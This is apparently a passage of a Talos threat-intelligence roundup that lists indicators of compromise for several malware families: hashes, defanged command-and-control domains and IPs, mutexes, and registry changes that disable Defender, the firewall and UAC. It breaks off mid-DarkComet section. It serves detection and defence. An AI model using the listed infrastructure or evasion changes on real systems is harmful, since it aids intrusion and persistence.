Friday, January 29, 2021

Threat Roundup for January 22 to January 29


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 22 and Jan. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Packed.Dridex-9823030-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Gh0stRAT-9823621-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Ransomware.Cerber-9826826-1 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber." In more recent campaigns, other file extensions are used.
Win.Trojan.Hupigon-9823466-0 Trojan Hupigon is a trojan that installs itself as a backdoor on a victim's machine.
Win.Packed.Tofsee-9824692-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Dropper.DarkComet-9823729-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Virus.Expiro-9826837-0 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Packed.Chthonic-9826669-1 Packed Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer.

Threat Breakdown

Win.Packed.Dridex-9823030-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Files and or directories created Occurrences
<malware cwd>\old_<malware exe name> (copy) 14

File Hashes

3755691f9bff778d637b19b94a67492af2442f95cab2591b988210330875b0df 4348e58057aee19e92f8ff04e1c34518d27870def8023f9b307741d3b0b21b53 49d77a61ac463c8cc04b86fc519d7a8053d3a2327491ded37eede6439309299e 4cc918dace37f097834e5f64701d3b1e3734cb969b40dde671819f1793fcea30 79a341dfe5c6a25846666c8e47422118eb3b005abfe5ba29f56d2ddddfbc6ca1 7a60d512a90316abe8b5d0edc11118e6e6fb091f86a4a21ee14ce6b977bda250 8ec4aa6cbb01256b9deef81bcf3eb5f86317bf422d5996e37e84dbbb22631682 8ed7be33532c3cd759649af68db4f28646630d0646a2e254f1b27ec16565d655 ad14c8b993a4e03ebecf7358c091914a6c3441fb3870973eedbb38202841596c c3c0b001e5e52f04f0c97aa90fdee8c2c00ab704f685c07c8e47118637eb245c e116f1afd7344ffd8ae03a10a2fa94dd1b17e05201237508af4899783e18e1c5 e34085a13c1a9178a5160993834aa9052440948955a7cc6cc795331f96fc7dbd e58224d96312291f651e2213437699c7506fbaf9d96ba6054daa9703e9c8dc07 fad4999eac6048223f2cad76805e38b2048db2677531d1f68c25ecdb7ee41dcb

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.Gh0stRAT-9823621-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Type
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Start
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ErrorControl
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: WOW64
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ObjectName
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: FailureActions
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Description
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: DisplayName
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ImagePath
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: FailureActions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: FailureActions
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU WXYABCDE GHI
Value Name: Description
1
Mutexes Occurrences
<original file dir>\<original file name>.exe 13
gyw.f3322.net:8016 3
C:\Windows\kqumii.exe 3
cq3426.3322.org:1150 3
C:\Windows\gmgueg.exe 3
www.q-show.org:1150 2
C:\Windows\ciscae.exe 2
C:\Windows\vondgu.exe 2
C:\Windows\rkzlcs.exe 1
www.xuwupiaomiao.com:801 1
115.28.153.10:1150 1
127.0.0.1:1150 1
pzss.f3322.org:1165 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
59[.]46[.]80[.]202 3
103[.]252[.]19[.]106 3
185[.]199[.]109[.]153 1
185[.]199[.]111[.]153 1
115[.]28[.]153[.]10 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
gyw[.]f3322[.]net 3
cq3426[.]3322[.]org 3
www[.]q-show[.]org 2
www[.]xuwupiaomiao[.]com 1
pzss[.]f3322[.]org 1
zqyxuwupiaomiao[.]github[.]io 1
Files and or directories created Occurrences
%SystemRoot%\kqumii.exe 3
%SystemRoot%\gmgueg.exe 3
%SystemRoot%\boxlou.exe 2
%SystemRoot%\wwmiwy.exe 2
%SystemRoot%\ciscae.exe 2
%SystemRoot%\vondgu.exe 2
%SystemRoot%\mmqcmg.exe 1
%SystemRoot%\hufzuk.exe 1
%SystemRoot%\kkwgks.exe 1
%SystemRoot%\lchlci.exe 1
%SystemRoot%\rkzlcs.exe 1
%SystemRoot%\ookyou.exe 1
%SystemRoot%\vipxie.exe 1

File Hashes

1cb9155a8f2b0116c74ad7207c24d8d62cc16a499202099b67b5dba66a939359 1fab2aff0dbcac874252922eafa755f599e161066f2750ffbbfdebf422398abc 353a9f9a607ba9911212d189dad291ed746f41539c55cdcf21ea2cc074bba64b 362341c99234be0662dc57f292eb4ddf1bb2af0c883834ef4ebbdea536bb4462 48b97e4ee26211111b9f8430d0f20851bad219d476638ec4238c8a73903ba6ab 57f03d3dcecb74f91be7da44b22f7283ab8d89bcbe84b743c1a07bbe75b75b81 5fc6610e630742ea6342d103b9e79c5f2b38fe35e55479d373866a8788085de5 80f14ef95b63e9ffa1ba4597f46aca85aa4ec3de4776f0beb4f8652d1b35071d b98016fd39b41a7ff58c7ea2ff0c2b251fe04ebd4c7f4cb5c9239888df273455 b9f1d3de3a5714eb04c0b68cccedb86126e0579739f319e02a7cdd158950fe6c bc2b78512339c5e8169a2ba5c22e348c470304236a176a373547b5d9fb02aa8f edccd09778d2a0f6bcfec9679f0c8f60ba34039fd92776e3eb198c40db58271a f3c5f3d2363eaa9200ef6de96a3825192bb8b1a7d57633e2cca9de852b19dfd9

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Ransomware.Cerber-9826826-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 132 samples
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 132
shell.{<random GUID>} 24
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 132
91[.]119[.]56[.]0/27 132
91[.]120[.]56[.]0/27 132
91[.]121[.]56[.]0/22 132
104[.]21[.]50[.]61 76
104[.]20[.]21[.]251 28
172[.]67[.]157[.]138 16
172[.]67[.]2[.]88 16
104[.]20[.]20[.]251 15
54[.]87[.]5[.]88 4
193[.]242[.]211[.]182 2
52[.]21[.]132[.]24 2
104[.]16[.]150[.]172 2
104[.]16[.]148[.]172 2
172[.]67[.]69[.]167 2
104[.]16[.]152[.]172 1
198[.]55[.]100[.]116 1
23[.]152[.]0[.]36 1
104[.]26[.]14[.]247 1
104[.]26[.]15[.]247 1
173[.]194[.]175[.]102 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 132
bitaps[.]com 132
btc[.]blockr[.]io 132
chain[.]so 132
sochain[.]com 2
p27dokhpz2n7nvgr[.]1ktjse[.]top 2
p27dokhpz2n7nvgr[.]1lseoi[.]top 1
p27dokhpz2n7nvgr[.]1h23cc[.]top 1
p27dokhpz2n7nvgr[.]1cglxz[.]top 1
Files and or directories created Occurrences
%TEMP%\d19ab989 132
%TEMP%\d19ab989\4710.tmp 132
%TEMP%\d19ab989\a35f.tmp 132
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 25
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 25
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 25
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.hta 25
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.png 25
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 24
%TEMP%\24e2b309\1719.tmp 20
%TEMP%\24e2b309\4436.tmp 20
%TEMP%\<random, matching [a-z0-9]{8}\[a-f0-9]{4}>.tmp 4

File Hashes

032c8169d8009fc30479b5ec5438a88fd5daeb576ced3c1d95786c4257ed9145 03fc7d18984c43544b429208a124c1ab3bf71c6876f1f2a1c3b54703f9a53a71 046da337f4ac96c679c3da97556c57427086cb4e81ac4218c2edc7956e775d22 0804f23ccd203cc2de3277a9f6a58e578b716a78f7d93588b9538213a9a6f72f 09590181a0f19560f80f28e3c541df7356e5fc7bc373d8d1a33e9a602c7d76dd 0a37d20ad25e354cd3e1f616275021744a7c776dacb45091df94e6883f206dc8 0ad8711b6997b9ccd46d330fa3056745b7981e3fc94ce343732ea47e87576905 0afaf4a5b6fa740a435d93d07f21e3616535725941defc2fc8e447c478aad736 0e8ff26596d14aa9947d5fb5399942ea8b17cbadaad54f510495a513715a0ca6 0f1c51d55dc4bde3cf0c62147fbe6409bdc4d341d52247d00f586a6482af1511 0fc6b54304648fc6f5898fa8ab503f685b105357e52db6af021253a56bb8f247 0fd42b326666f13440fa0008f810f0a125e1d25e3225464ebf9262bedb0d835c 10bf9202a6db75f84b931357ac21779597eadbc7bb620f7ff915be705f490309 12bd04c85e976145c51d531bbf4932c38dff9064be2aec2ecb4af3c04d1d4768 14782954d5ba87fc0fd79706df2f3227dea9344226286332a2f4211bd18901af 17aac7c01de3788aad85bc623cf78da5260335083d4d3b77f3682d27462cffea 1947c3ab281844c155f6edbbee45587f70ff02602137a860e53a597c6751df5a 1c3951053d16ee881dfa8d36a9a64473a13f089cfba5c59ebfba9cbac65b47f2 1d665c0a28a799ed88b4fbe1b6b66a89836030c4f9f6b287489fa6c92a350452 2452a341ed8bca9dd380e6b97b0270b75c042b49fa4b7c769e2effa1cf778b57 26c069149f3410c89729662a8a32196ab35619187b98715923ec8d0369ba8aa5 29992dfdd2bf0a5a480e71748bbb392c13658062b7d838633299b5677f374824 2c2c8c256a1c1f2bff07cdec1de5731cc2c211d19d646e896845e96e5fcd7c04 2ede459b0e8a5fe2c03bbfbbf301b9a87f9433da264263dc392cb8286e178e0e 351f96f2d1983cf7a7d9d0d12d9222ec0a2669a020af25d4c9405d24c18d7292
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



Malware



MITRE ATT&CK





Win.Trojan.Hupigon-9823466-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Mutexes Occurrences
Local\https://m.stripe.network/ 2
Local\https://www.gettoggle.com/ 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]79[.]197[.]200 19
199[.]59[.]242[.]150 17
107[.]178[.]240[.]89 16
199[.]59[.]242[.]155 15
142[.]250[.]80[.]4 15
172[.]217[.]3[.]106 14
172[.]217[.]7[.]3 13
72[.]22[.]185[.]207 10
72[.]21[.]81[.]200 9
65[.]55[.]252[.]93 9
209[.]85[.]232[.]95 7
209[.]85[.]201[.]94 7
72[.]22[.]185[.]199 6
192[.]35[.]177[.]64 6
142[.]250[.]64[.]74 6
13[.]107[.]21[.]200 4
131[.]253[.]33[.]200 4
172[.]217[.]197[.]104/31 4
91[.]199[.]212[.]52 3
23[.]3[.]13[.]33 3
23[.]3[.]13[.]40 3
209[.]85[.]144[.]95 3
173[.]194[.]66[.]95 3
13[.]107[.]22[.]200 3
142[.]250[.]80[.]10 3
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ajax[.]googleapis[.]com 17
fonts[.]gstatic[.]com 17
ads[.]pro-market[.]net 16
pbid[.]pro-market[.]net 16
tracking[.]bodis[.]com 15
spanish[.]ircfast[.]com 13
cs9[.]wpc[.]v0cdn[.]net 9
sqm[.]telemetry[.]microsoft[.]com[.]nsatc[.]net 9
english[.]ircfast[.]com 3
ctldl[.]windowsupdate[.]com 2
cdnjs[.]cloudflare[.]com 2
apps[.]digsigtrust[.]com 2
apps[.]identrust[.]com 2
cm[.]g[.]doubleclick[.]net 2
match[.]adsrvr[.]org 2
crt[.]usertrust[.]com 2
cdn[.]ravenjs[.]com 2
aa[.]agkn[.]com 2
bcp[.]crwdcntrl[.]net 2
beacon[.]krxd[.]net 2
ce[.]lijit[.]com 2
d[.]turn[.]com 2
dpm[.]demdex[.]net 2
idsync[.]rlcdn[.]com 2
pixel-sync[.]sitescout[.]com 2
*See JSON for more IOCs

File Hashes

0b3b37ad4215c7b24f7a64cf569cd8d7fc28421cc98c28447d2aedf007355c51 125fa1bbf6efd7826c7d793368820f4787036fd5c8d81e7ff651a003503a52c9 2c47d33643e8a1c53684e0e4e3dca6e185b3cee12c276371a2910ba722ccd273 4d3dbfa2067ebf89bb667b5408ab01b2c1e6565b33b8e2440307aab60ace1063 54d2190d82dc8ee4d50921bde9178970907dd80f0e8492185172e4151c5dd464 7cd7490da59c3b78585b0d9378da9967152ee8dda3da2dd5297d9cb0ae9132c9 88c170868b26a70b9b5de9806e9c9b7e7e0c75be0b9b897df3eea1379760a8b4 89271d8fc49283958d56665c4573f7c0cd3dfc6b6dc30c95827792f6f4ef6c83 89efd543179b1cf802d21c9bc23b33b5d554a5987eeb0fb15efdeafb9893eb96 8c19e420ab70ba60dddfbf705c7606267e2afe25c624ee7a1b9b94b7144c80c1 8ece974bb801aa0d3b0c28053bda5fc096f49d653ece3483348b0a51c35d8616 9f822f7814f21967f4ba1b020c204a6b36f7ca75da984b4a20dc6c6b5577941e a7ef5b77fdb0aab1d4a86bf9222e810621f70e9059e8742413fe38075831d8af aee6ac3c086139593b0553b403d797fdc0e9aa81409b00c57be027e83abf6455 b1cccb0593a395311bcb319fbbac039a920b1919b9da091b39d4a3afa2718ef4 b2a33886e81b6386881d49135ec8ad238eea6221673bf70d7f4a4f185ecf7344 ca0ed61b6d989c8d7f22e38b8316471a396b278fcc93e18a693378771281ff2b ee0f1030ab0fbbce521d912297040ba4542c2727787887d75c5fe550da7ef55b fd8b449289e3dad46fc9908c463563bca11030cd5501e1077b50bbb8db926675

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Tofsee-9824692-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 107 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
107
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 107
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
106
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
61
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
43[.]231[.]4[.]7 107
69[.]55[.]5[.]249 107
239[.]255[.]255[.]250 106
217[.]172[.]179[.]54 106
5[.]9[.]72[.]48 106
130[.]0[.]232[.]208 106
144[.]76[.]108[.]82 106
185[.]253[.]217[.]20 106
45[.]90[.]34[.]87 106
185[.]254[.]190[.]218 106
157[.]240[.]18[.]174 102
176[.]9[.]119[.]47 78
157[.]240[.]2[.]174 72
104[.]47[.]54[.]36 57
69[.]31[.]136[.]5 56
12[.]167[.]151[.]116/30 55
104[.]47[.]53[.]36 50
67[.]195[.]204[.]72/30 49
172[.]217[.]165[.]132 38
142[.]250[.]80[.]4 37
37[.]1[.]217[.]172 35
172[.]217[.]197[.]103 35
216[.]239[.]32[.]21 33
172[.]217[.]197[.]99 33
209[.]85[.]233[.]26/31 32
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 107
microsoft-com[.]mail[.]protection[.]outlook[.]com 107
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 106
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 106
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 106
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 106
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 106
msr[.]pool-pay[.]com 74
schema[.]org 66
api[.]sendspace[.]com 56
www[.]amazon[.]com 40
work[.]a-poster[.]info 35
www[.]google[.]co[.]uk 25
market[.]yandex[.]ru 24
117[.]151[.]167[.]12[.]in-addr[.]arpa 23
www[.]sendspace[.]com 19
119[.]151[.]167[.]12[.]in-addr[.]arpa 19
d3ag4hukkh62yn[.]cloudfront[.]net 16
www[.]google[.]de 15
e6225[.]x[.]akamaiedge[.]net 14
sso[.]godaddy[.]com 14
ip[.]pr-cy[.]hacklix[.]com 13
e15316[.]e22[.]akamaiedge[.]net 13
120[.]151[.]167[.]12[.]in-addr[.]arpa 12
116[.]151[.]167[.]12[.]in-addr[.]arpa 10
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 107
%SystemRoot%\SysWOW64\config\systemprofile:.repos 107
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 106
%TEMP%\<random, matching '[a-z]{8}'>.exe 105
%System32%\config\systemprofile:.repos 91
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 80
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10
%System32%\dsxnnoo\ehnhwhsy.exe (copy) 1
%System32%\ouewjtk\xxyjefdl.exe (copy) 1
%System32%\xpastio\tyidxjgi.exe (copy) 1
%System32%\gmhdxak\qkkbmvmo.exe (copy) 1
%System32%\ktkxhdj\mktudzok.exe (copy) 1
%System32%\sidnzcr\foinfezv.exe (copy) 1
%System32%\pdfgkrg\oxrwonie.exe (copy) 1
%System32%\qimtsxf\dgmgvgrx.exe (copy) 1
%System32%\zbdfcry\rzosfdmm.exe (copy) 1
%System32%\rmywcty\xfuyljss.exe (copy) 1
%System32%\mpyany\idhzpaca.exe (copy) 1

File Hashes

00c674842485d0a34c56abb7a1e673c79875fe35382ea51e1a2ff16edc3c240e 02f60d18bd98377c7af870845b3d9a7bfc2a6e6f2e4fb324b1c1fd6f9f2dbbca 03b7ce534b05d0070f70be70d141c822fed561768904bea1eda77f2d37bd2cfc 03e0dd8a7ea927539e4d2990de10584ac74dbb68949a4b8fb9005823dd3cb51d 04d66ec3bee8c60bbaf4a5aeb47c80901f9a6c9d8354a2ee9095a75362dee565 0523677ff3a1846a4e031ce41d60a4e07d3d3817c3d544a13e8086dc288080fa 09d199274b707bc8d8f35c7e37e8afffcff5e4e087c713a769d23bccd1af7553 0a56c5f9445ccc7f3b9562be7a52ca1400e71ed7e8d67c781bcf0d8c16bd97a1 0c3ddab7c322a82233728f3f2424e23f0ecb37f58630f501c0413326b3af03a9 0c8421f55d2a4917b014f870e8f4bc6d200938e460e7209e4e95c70c2550f90b 14d15c7aaef433855564d0e1a447ecf955bc3e2a52ab20a855e704730cbbd04e 16d7303d3a93b51cdca260056269783b6d3a69e645e66c2c7a79e1ceecf67849 1986abe00926f936566dfb097af7d2a1e412ced3f73926f86afd01b30a80fba3 1f0e3d30b3b9aa38f14a6ba542326c3789a9783d4caeef65e862a0eedce2295e 1f33c7ce24bd950531a23fa49aa68a245d670309d19cb890ea35200101e4edd3 22eb9f988595b1233f885ccef90f74ba7a4e14991e650b82778d76274041bff5 23b381132bbfa22cfa650db8a9f4c7baae32008626bed30c4f9bd718bc8e0033 23c876df2fc90b44b23fc2fd66defad929e95898f0194912fdbae4e642d0d143 274f3d0758f41dcd86d34fd05d771b2de81a326f7c09dcee4fd553b19fe97e73 28e7890934af692e34386be108633c304a17bf084d6992b9e8d697984b258f5d 2f58b323febc290e36a187ac54e24808c2b721c8acb29f7ae234a1dfd1604b28 30ed820da7bb41441e194173fbfbd18d9207634180d025f723f338e3b0789cbd 31d8ea597a357e85181e04bd46a3ff3965bcb38f054226f356e3b3a76c8fbe10 358c63023dd6a4fd51717768eba13a95ea58c78660055055feeeed6ecb08e9db 3685a74575109eca8855aac519d914dab5d7b73e8fa6861c3386f6a1d4396e54
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.DarkComet-9823729-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
11
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
5
